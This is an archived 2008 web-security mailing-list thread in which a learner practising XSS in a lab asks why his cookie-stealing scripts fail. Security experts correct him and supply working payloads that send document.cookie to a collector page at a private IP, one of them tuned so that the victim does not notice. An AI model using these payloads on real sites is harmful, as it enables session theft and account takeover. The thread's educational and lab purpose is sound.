
RE: [WEB SECURITY] XSS Help



[evil hat on]
No reason to write a new DOM element simply to blindly beacon some data back to the attacker. DOM operations are slow and this would create a broken image looking thing that might alert a victim unless you returned a true image. Instead use:

<script>
var img = new Image();
img.src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck=" + document.cookie;
</script>

Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069

From: Ryan Barnett [mailto:rcbarnett@xxxxxxxxx]
Sent: Thursday, June 05, 2008 11:03 AM
To: GsNaseer Gs
Cc: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] XSS Help

A few notes -

1) The correct term for the DOM variable is document.cookie instead of document.cookies - drop the "s" at the end.
2) You need to use proper syntax within the JavaScript to dynamically place the value of the document.cookie data into the new URL. This means that you need to play around with single and double quotes. Try the JavaScript below and see if it works for you -

<script>document.write('<img src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck='+document.cookie+'"')</script>

--
Ryan C. Barnett
ModSecurity Community Manager
Breach Security: Director of Application Security
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache


On Thu, Jun 5, 2008 at 9:20 AM, GsNaseer Gs <gsnas29@xxxxxxxxxxx> wrote:
Hi!

I am new to this forum. I was practising to learn the concepts of XSS (Cross-Site Scripting). I am using two different applications on two different machines. I want to dump cookies of one application into another application's database. For that I am using this script to send cookies:

<script src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+document.cookies>

<script src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+escape(document.cookies)>

<script>new Image().src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+encodeURI(document.cookies)</script>

/*None of these scripts are working for me*/

I am able to dump a blank record without any cookie values (null). I am trying this out on IE 7.

Please, can anybody help me and guide me through where I am wrong?


Thanks









Brought to you by http://www.webappsec.org